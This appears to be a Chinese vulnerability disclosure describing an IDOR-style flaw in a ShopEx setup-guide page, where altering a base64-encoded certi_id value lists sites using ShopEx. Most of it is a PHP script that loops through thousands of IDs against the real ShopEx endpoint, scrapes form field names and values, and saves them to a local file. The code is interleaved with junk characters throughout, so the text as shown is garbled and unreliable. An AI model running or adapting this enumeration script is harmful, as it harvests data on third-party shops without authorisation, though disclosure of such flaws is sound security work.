|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站

<?php
/ u: }% g1 v* ?; o. Y
- p, G$ m5 \2 `- Z# q for ($i=1; $i < 10000; $i++) { //遍历
|. o+ r7 ?& v0 B
: P6 @5 s) T! [$ G ShowshopExD($i);3 o, s; b6 U" G; N, e! i2 {4 |( F
% e' a( S. ]5 u }
1 p" G J" W6 F
2 S$ `& u+ v* b% s. A, U0 g0 n function ShowshopExD($cid) {
6 \" m) B; Q; o3 s% [( h3 _3 x1 i. S
/ T+ f! ?; ]1 m# m% X+ \; N $url='http://guide.ecos.shopex.cn/step2.php';
: B3 a/ K$ w, n4 K
& K. z- P) r# P $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');/ ]5 Y" B/ y" [6 m" T) _
/ D4 o4 s( E3 \- W3 X( A* v $url = $url.'?refer='.$refer;( P6 l- A7 G U
+ O% X& ~2 g& w
$ch = curl_init($url);
' R, p4 F; w# W d% e8 Z$ l1 f |" g6 U& n
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 k* f2 p$ k6 g( |) c$ J
* ]4 \, s1 `, Y: h: s# `, R curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
9 T8 |3 z7 ~6 I: V) b+ a3 N% E2 L/ R/ s' E7 a% B- }7 p
$result = curl_exec($ch);% q& ~& M( m: {8 c# I. b! ~
6 L3 E& g2 b( g) M `. V8 x $result = mb_convert_encoding($result, "gb2312", "UTF-8");: m# c) E+ [- O j. b: S8 _
9 k& n8 \+ g2 C if(strpos($result,$refer))
+ m6 ~! H" z j8 u2 q, ~6 N* M) }5 k% }/ G/ b5 [: _+ K# W
{2 R( M! t2 {! } ?
, q# |& s2 p: j* N- h( L' O2 Q $fp = fopen("c:/shopEx.txt",'ab'); //保存文件' n/ T- q# F6 U9 P3 B
5 G( x" c w. H6 g2 p
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);4 `0 m9 Q. F2 a! D+ B: L4 [
4 M. }7 g* N/ \4 `' x
foreach ($value[1] as $key) {% k& H1 I6 H0 q& J6 Q6 u6 X+ U! s
+ V* k' J' W9 c- h* Z6 [7 ]( ^7 w7 s
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);# k2 L% ~/ P; _
" l1 }* U2 j% X. P% u O echo $res[1][0].':'.$res[3][0]."\r\n";
( _. t |) \' j4 x5 {6 r! [
- t4 D C9 e) X: w1 O $col =$res[1][0].':'.$res[3][0]."\r\n";
# {. e* ~1 r# @ i
. i7 h* S/ ?4 P( {! }* A! l fwrite($fp, $col, strlen($col));
. f& E8 d: Q, y( f' D: ?9 ?: ^8 U# G, H; M
}- ?$ I) @. t. B- g
7 s0 s. l" i' W& h9 [
echo '--------------------------------'."\r\n";: }3 ~8 i9 A+ H& Q
; y( v9 b: K$ x( l# P8 Z fclose($fp); # x5 f. l+ ?& G' H9 V/ b' f \' X
: A& p( h8 c2 ` }2 F, S N" I& n
# _3 w# t! j" m) j! Z% t/ }6 e2 ]# O flush();
2 Z4 i* W7 Q% x. X+ w* A
; N y: V k, `: n% M+ B curl_close($ch);
% E" u" b2 D9 m3 Q. s" t i# r3 Y5 h% `2 S; V$ c
}. X6 D1 x" M. K/ H1 E0 a1 O A( s
4 Y' j8 t u3 U8 ?& q5 G1 H' q
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|